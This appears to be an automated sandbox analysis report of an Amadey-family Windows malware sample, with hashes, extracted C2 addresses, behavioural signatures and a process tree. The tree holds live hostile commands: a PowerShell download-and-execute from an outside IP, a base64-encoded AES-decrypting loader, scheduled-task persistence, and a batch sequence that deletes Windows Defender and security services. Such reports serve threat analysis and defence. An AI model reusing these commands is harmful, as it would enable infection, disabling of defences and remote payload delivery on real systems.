Analysis
-
max time kernel
26s -
max time network
71s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
30/03/2025, 14:08
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
84c300a105cb5e140c8c91e2c6ead590
-
SHA1
5bd18b75d71b2824913a508ce28db8d4c2a936b9
-
SHA256
edfb2e4f23a9c490eb887fe69d57aab4dea230d0b76e3b1c95babb559c36fa58
-
SHA512
eec8f1abe337ec6e09cdf613c015a1cf84a58217f063d884e4a4ef8a925f17f8c7c869ce81e081e81382cb5860cdc46f1b4cb96923b97c0d41e76dd98d99f106
-
SSDEEP
24576:oqDEvCTbMWu7rQYlBQcBiT6rprG8a06u:oTvC/MTQYxsWR7a06
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Signatures
-
Amadey family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1964 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2424 powershell.exe 1964 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 1 IoCs
flow pid Process 4 1964 powershell.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Executes dropped EXE 2 IoCs
pid Process 2852 TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE 2004 rapes.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine rapes.exe -
Loads dropped DLL 4 IoCs
pid Process 1964 powershell.exe 1964 powershell.exe 2852 TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE 2852 TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1632 takeown.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2852 TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE 2004 rapes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE -
Launches sc.exe 25 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2740 sc.exe 3000 sc.exe 2964 sc.exe 2624 sc.exe 1028 sc.exe 1984 sc.exe 1572 sc.exe 1648 sc.exe 876 sc.exe 2616 sc.exe 1904 sc.exe 2388 sc.exe 2612 sc.exe 2796 sc.exe 2308 sc.exe 1544 sc.exe 1712 sc.exe 2496 sc.exe 1372 sc.exe 1268 sc.exe 2768 sc.exe 1964 sc.exe 2880 sc.exe 1696 sc.exe 2600 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE -
Delays execution with timeout.exe 1 IoCs
pid Process 1260 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2628 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 2852 TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE 2004 rapes.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1964 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2852 TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1720 wrote to memory of 2604 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 1720 wrote to memory of 2604 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 1720 wrote to memory of 2604 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 1720 wrote to memory of 2604 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 1720 wrote to memory of 2624 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 1720 wrote to memory of 2624 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 1720 wrote to memory of 2624 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 1720 wrote to memory of 2624 1720 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 2604 wrote to memory of 2628 2604 cmd.exe 33 PID 2604 wrote to memory of 2628 2604 cmd.exe 33 PID 2604 wrote to memory of 2628 2604 cmd.exe 33 PID 2604 wrote to memory of 2628 2604 cmd.exe 33 PID 2624 wrote to memory of 1964 2624 mshta.exe 34 PID 2624 wrote to memory of 1964 2624 mshta.exe 34 PID 2624 wrote to memory of 1964 2624 mshta.exe 34 PID 2624 wrote to memory of 1964 2624 mshta.exe 34 PID 1964 wrote to memory of 2852 1964 powershell.exe 37 PID 1964 wrote to memory of 2852 1964 powershell.exe 37 PID 1964 wrote to memory of 2852 1964 powershell.exe 37 PID 1964 wrote to memory of 2852 1964 powershell.exe 37 PID 2852 wrote to memory of 2004 2852 TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE 38 PID 2852 wrote to memory of 2004 2852 TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE 38 PID 2852 wrote to memory of 2004 2852 TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE 38 PID 2852 wrote to memory of 2004 2852 TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Z9dCKmatYVy /tr "mshta C:\Users\Admin\AppData\Local\Temp\VOmS8nPeq.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Z9dCKmatYVy /tr "mshta C:\Users\Admin\AppData\Local\Temp\VOmS8nPeq.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2628
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\VOmS8nPeq.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Users\Admin\AppData\Local\TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE"C:\Users\Admin\AppData\Local\TempSP7WU0KGGHT4MKRSJYSUGUI7K8ZPPV8B.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2004 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"6⤵PID:2524
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"7⤵PID:2088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Command and Scripting Interpreter: PowerShell
PID:2424
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe"1⤵PID:684
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10D2.tmp\10D3.tmp\10D4.bat C:\Users\Admin\AppData\Local\Temp\221.exe"2⤵PID:1688
-
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe" go3⤵PID:2008
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10F2.tmp\10F3.tmp\10F4.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"4⤵PID:896
-
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"5⤵
- Launches sc.exe
PID:2308
-
-
C:\Windows\system32\sc.exesc start ddrver5⤵
- Launches sc.exe
PID:1572
-
-
C:\Windows\system32\timeout.exetimeout /t 15⤵
- Delays execution with timeout.exe
PID:1260
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y5⤵
- Modifies file permissions
PID:1632
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"5⤵
- Launches sc.exe
PID:1544
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f5⤵PID:1616
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"5⤵
- Launches sc.exe
PID:2600
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"5⤵
- Launches sc.exe
PID:2388
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f5⤵PID:2104
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"5⤵
- Launches sc.exe
PID:1712
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"5⤵
- Launches sc.exe
PID:1904
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f5⤵PID:580
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"5⤵
- Launches sc.exe
PID:1984
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"5⤵
- Launches sc.exe
PID:1028
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f5⤵PID:1264
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"5⤵
- Launches sc.exe
PID:1696
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"5⤵
- Launches sc.exe
PID:2616
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f5⤵PID:2988
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"5⤵
- Launches sc.exe
PID:2624
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"5⤵
- Launches sc.exe
PID:876
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f5⤵PID:2728
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"5⤵
- Launches sc.exe
PID:2880
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"5⤵
- Launches sc.exe
PID:2964
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f5⤵PID:2784
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"5⤵
- Launches sc.exe
PID:2796
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"5⤵
- Launches sc.exe
PID:2496
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f5⤵PID:3044
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"5⤵
- Launches sc.exe
PID:2612
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"5⤵
- Launches sc.exe
PID:1964
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f5⤵PID:2528
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"5⤵
- Launches sc.exe
PID:3000
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"5⤵
- Launches sc.exe
PID:1268
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f5⤵PID:844
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"5⤵
- Launches sc.exe
PID:1372
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"5⤵
- Launches sc.exe
PID:2740
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f5⤵PID:2748
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f5⤵PID:2452
-
-
